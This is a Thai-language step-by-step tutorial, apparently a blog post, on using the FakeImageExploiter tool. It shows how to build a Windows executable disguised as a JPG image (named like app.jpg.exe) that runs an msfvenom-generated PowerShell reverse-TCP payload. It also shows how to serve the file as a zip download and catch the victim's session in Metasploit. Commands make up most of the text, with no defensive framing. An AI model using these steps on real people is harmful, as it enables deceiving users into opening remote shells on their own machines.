FakeImageExploiter เป็น application ที่ใช้สำหรับการสร้าง exe ขึ้นมาเพื่อทำการ download jpg และ ps1 (powershell),exe,bat,txt โดยไฟล์ exe ที่ถูกสร้างขึ้นมาจะมีชื่อประมาณว่า app.jpg.exe หาก client ไม่ได้ทำการ setting ให้แสดง extension ก็จะเห็นว่าเป็นไฟล์ jpg เฉยๆครับ
วิธีการ setup FakeImageExploiter
1. ทำการ download source code จาก git
1 |
git clone https://github.com/r00t-3xp10it/FakeImageExploiter |
2. จากนั้นรัน
1 |
./FakeImageExploiter.sh |
เพื่อทำการติดตั้ง application ที่จำเป็น และติดตั้ง wine32 เพื่อสำหรับการติดตั้ง Resource Hacker Application
1 |
dpkg --add-architecture i386 && apt-get update && apt-get install wine32 |
3. Download ResourceHacker.exe (http://www.angusj.com/resourcehacker/#download) และทำการติดตั้ง
1 2 |
cd ~/Downloads wine reshacker_setup.exe |
เมื่อทำการติดตั้งเสร็จแล้วให้ copy ไปไว้ที่ /root/.wine/drive_c/Program\ Files/
1 |
cp -pvr /root/.wine/drive_c/Program\ Files\ \(x86\)/Resource\ Hacker/ /root/.wine/drive_c/Program\ Files/ |
4. สร้าง malicious powershell,exe ด้วย msfvenom
1 |
msfvenom -p windows/powershell_reverse_tcp -e cmd/powershell_base64 -i 3 -f raw -o payload.ps1 LHOST=<IP> LPORT=445 |
*** หากเป็น exe ให้แก้ไขใน settings ของ FakeImageExploiter ด้วยว่าเป็น exe ครับ
5. รัน FakeImageExploiter อีกครั้ง
1 |
./FakeImageExploiter.sh |
เลือกไฟล์ภาพและไฟล์ ps1
เลือกภาพของ icon ไฟล์ exe ที่สร้างขึ้นมา
กำหนดชื่อของไฟล์ exe ที่จะสร้างขึ้นมา
เลือก IP และ port
ส่งไฟล์ ggwp.zip ไปยังปลายทาง (ตัว FakeImageExploiter นั้นจะมีการสร้าง web server ขึ้นมา เราสามารถทำ link ให้ user download ไฟล์ได้เลย)
6. เมื่อ client download และ zip file ออกมา จะพบไฟล์ที่เหมือนๆจะเป็น file ภาพอยู่
7. เปิดไฟล์ดังกล่าวขึ้นมา ตัว Metasploit ที่ Listen ค้างไว้ก็จะได้ session ในที่สุด